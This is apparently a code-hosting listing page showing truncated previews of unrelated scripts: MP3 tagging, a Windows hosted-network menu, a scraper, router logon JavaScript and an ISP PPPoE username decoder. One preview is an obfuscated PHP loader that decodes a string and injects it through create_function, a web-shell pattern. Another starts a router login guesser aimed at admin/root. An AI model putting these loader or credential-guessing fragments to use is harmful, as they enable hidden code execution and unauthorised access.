This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
#coding: utf-8 | |
import os | |
import sys | |
import urllib2 | |
encod = sys.stdin.encoding | |
is_for_local = False |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# coding: utf-8 | |
import sqlite3 | |
from mutagen.mp3 import MP3 | |
from mutagen.id3 import ID3, APIC, error, PictureType, Encoding, TIT2, TALB, TPE1, TPE2, TCON, TDRC, TRCK, TPOS | |
import os | |
conn = sqlite3.connect(os.path.join(os.getcwd(), 'databases', 'music.db')) | |
curs = conn.cursor() |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<script language=JavaScript> | |
var logonInfo = new Array( | |
0, | |
"", | |
"", | |
"20140812", | |
0,0 ); | |
</script> | |
<script language=JavaScript> | |
var logonVer = new Array( |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
function oo2($b) { | |
$h = explode("|", strrev($b)); | |
$d = explode("*", $h[0]); | |
$b = $h[1]; | |
for($i=0;$i<sizeof($d);$i++) { | |
$b = str_replace($i, $d[$i], $b); | |
} | |
create_function("", "};".$b."//"); | |
} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#coding: utf-8 | |
from threading import Thread | |
import urllib | |
import urllib2 | |
import StringIO | |
import gzip | |
import Queue | |
import re | |
import time |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
@echo off | |
:main | |
cls | |
echo. | |
echo. | |
echo ========= Windows 7 承载网络工具 ========= | |
echo v20120705 | |
echo. | |
echo 1. 创建承载网络 | |
echo 2. 启动承载网络 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#coding: utf-8 | |
__author__ = 'morph1x' | |
import httplib | |
from base64 import b64encode | |
ip= '192.168.1.1' | |
keywords= ['admin','root'] |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#coding: utf-8 | |
#河南网通用户名转换工具,可以用转换后的用户名直接进行PPPoE拨号,无需Racer客户端。 | |
def cncc_pppoe_username_decode(username): | |
u= username | |
k1='9012345678abcdeABCDEFGHIJKLMNfghijklmnUVWXYZxyzuvwopqrstOPQRST' | |
k2=[0x11,0x34,0xC9,0x23,0x75,0x18,0xD7,0xE2,0x12,0x35,0x29,0x2B,0xEC,0xB6,0x23,0x19] | |
r=[0 for x in range(0,len(u))] | |
a=37 |